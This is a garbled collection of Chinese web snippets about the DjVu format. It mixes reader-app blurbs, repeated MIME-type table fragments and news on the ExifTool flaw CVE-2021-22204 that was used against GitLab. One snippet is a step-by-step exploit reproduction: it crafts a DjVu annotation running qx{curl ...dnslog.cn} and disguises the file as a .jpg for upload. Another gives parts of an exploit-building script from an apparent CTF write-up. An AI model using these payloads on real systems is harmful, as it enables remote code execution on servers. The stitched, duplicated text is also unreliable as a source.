DjVu Reader Pro mac版是一款Mac平台上功能最全的DjVu阅读软件。 DjDjVu Reader Pro的功能包括:支持多页DjVu文件,搜索功能,查看黑白或全彩色文件,书签功能,单/双页模式,自定义窗口背景颜色,页面分隔管理,设置头版封面等等。 图片DjVu Reader Pro功能介绍即使是非常大的文件也可以快速打开DjVu文件并顺利读取文字选择搜索文档中的给定内容导出为PDF,TXT快速查看支持书签管理切换内容窗格:仅显示缩略图,大纲或内容
image-20211102172744884 搞个普通用户复现漏洞,注册ch4nge用户 登录后到个人主页,找到Snippets,新建 image-20211102201740899 此处需要上传DjVu 格式图片(即Exp) image-20211102201936387 2 DjVu格式图片制作方式 下载安装DjVuLibre地址 http://djvu.sourceforge.net/ 准备好将要压缩图片的文本 (metadata (Copyright "\ " . qx{curl cc.n443pb.dnslog.cn} . \ " b ") ) 生成Exp djvumake rce.djvu INFO =0,0 BGjp=/dev/null ANTa=rce.txt && mv rce.djvu rce.jpg image-20211102203205714 3 上传Exp image-20211102203859540
, ‘jpe’ => ‘image/jpeg’, ‘png’ => ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘djvu ’ => ‘image/vnd.djvu’, ‘djv’ => ‘image/vnd.djvu’, ‘wbmp’ => ‘image/vnd.wap.wbmp’, ‘ras’ => ‘image/
=> ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘djvu ’ => ‘image/vnd.djvu’, ‘djv’ => ‘image/vnd.djvu’, ‘wbmp’ => ‘image/vnd.wap.wbmp
Cysource 的安全研究人员 Shai Alfasi 和Marlon Fabiano da Silva 透露,该漏洞被追踪为 CVE-2021-22204(CVSS评分:7.8),是 ExifTool 对 DjVu 网络攻击者利用该漏洞的方法主要是通过 VirusTotal 平台的网络用户界面上传一个DjVu文件,利用它来触发 ExifTool 的高严重性远程代码执行漏洞。
跨平台的电子书阅读器,平台支持 Windows,macOS,Linux 和网页版,格式支持 epub, pdf, mobi, azw3, txt, djvu, markdown, fb2, cbz, cb Koodo Reader 一个跨平台的电子书阅读器 预览 特色 支持阅读格式: EPUB (.epub) 扫描文档 (.pdf, .djvu) Kindle (.azw3, .mobi) 纯文本 (
application/x-director', 'dif' => 'video/x-dv', 'dir' => 'application/x-director', 'djv' => 'image/vnd.djvu ', 'djvu' => 'image/vnd.djvu', 'dll' => 'application/octet-stream', 'dmg' => 'application/octet-stream
jpeg’, ‘jpe’ => ‘image/jpeg’, ‘png’ => ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘djvu ’ => ‘image/vnd.djvu’, ‘djv’ => ‘image/vnd.djvu’, ‘wbmp’ => ‘image/vnd.wap.wbmp’, ‘ras’ => ‘image/x-cmu-raster
输入格式 PDF、PDF/А、TIFF、GIF、JBIG2、PNG、BMP、JPEG、DjVu、DOC(X)、XLS(X)、PPT(X)、VSD(X)、HTML、RTF、TXT。 ? 保存格式 DOC(X)、XLS(X)、PDF、PDF/А、RTF、TXT、 CSV、ODT、EPUB、FB2、DjVu、PPTX、HTML、TIFF、JPEG、PNG等等。
, ‘jpe’ => ‘image/jpeg’, ‘png’ => ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘djvu ’ => ‘image/vnd.djvu’, ‘djv’ => ‘image/vnd.djvu’, ‘wbmp’ => ‘image/vnd.wap.wbmp’, ‘ras’ => ‘image/
background image # ANTz = Will write the compressed annotation chunk with the input file djvumake exploit.djvu user-defined EXIF tags here... }, ); 1; #end% EOF exiftool -config configfile '-HasselbladExif<=exploit.djvu ' "2" rm configfile payload.bzz payload exploit.djvu echo -e -n "\n{G}Finished${RS}" 得到前半段flag的poc:
jpe’ => ‘image/jpeg’, ‘png’ => ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘djvu ’ => ‘image/vnd.djvu’, ‘djv’ => ‘image/vnd.djvu’, ‘wbmp’ => ‘image/vnd.wap.wbmp’, ‘ras’ => ‘image
Bowling在通过HackerOne网站提交的报告中表示,他发现了一种方法可滥用ExifTool如何处理用于扫描文档的DjVu文件格式的上传,从而对整台底层的GitLab Web服务器获得控制权。 防止攻击的最简单方法是在服务器层面阻止DjVu文件的上传,如果公司不需要处理这种类型的文件的话。
, ‘jpe’ -> ‘image/jpeg’, ‘png’ -> ‘image/png’, ‘tiff’ -> ‘image/tiff’, ‘tif’ -> ‘image/tiff’, ‘djvu ’ -> ‘image/vnd.djvu’, ‘djv’ -> ‘image/vnd.djvu’, ‘wbmp’ -> ‘image/vnd.wap.wbmp’, ‘ras’ -> ‘image/
它不仅支持PDF文档的阅读,而且提供XDF、EPUB、Mobi、Azw、CAJ、OFD、XPS、DjVu等多种文件的阅读,而且只有5M大小,非常的简便,同时也提供简单的注释功能。 图片 图片
Koodo Reader 这是个免费好用的跨平台电子书阅读器,支持Windows,macOS,Linux 和网页版,文件格式支持 epub, pdf, mobi, azw3, txt, djvu, markdown
Mozilla --content-disposition --mirror --convert-links -E -K -p http://example.com/ 你也可以添加: -A pdf,ps,djvu
它支持 PDF、Postscript、Tiff、XPS、DjVu、DVI 等文档格式。它具有以下特点: 搜索工具。 页面缩略图方便参考。 文档索引。 文件打印。 加密文档查看。 它还支持其他文档格式,包括 PS 和 DjVu。 以下是其功能和组件的列表: 使用 Qt 工具包作为界面。 使用 CUPS 进行打印。 支持大纲属性和缩略图窗格。 支持缩放、旋转和拟合功能。
支持打开PDF、ePub、MOBI、XPS、DjVu、CHM、CBZ、CBR格式文件。它是一个轻量级的阅读器,专注于提供高效、简洁的PDF阅读体验。
在通过Hackerone提交的一份报告中,Bowling说他发现了一种滥用Exiftool处理用于扫描文档的DJVU文件格式上传的方法,以获得对整个GitLab Web服务器的控制权。 防止攻击的简单方法是阻止DjVu文件在服务器级别上载,如果公司不需要处理此文件类型的话。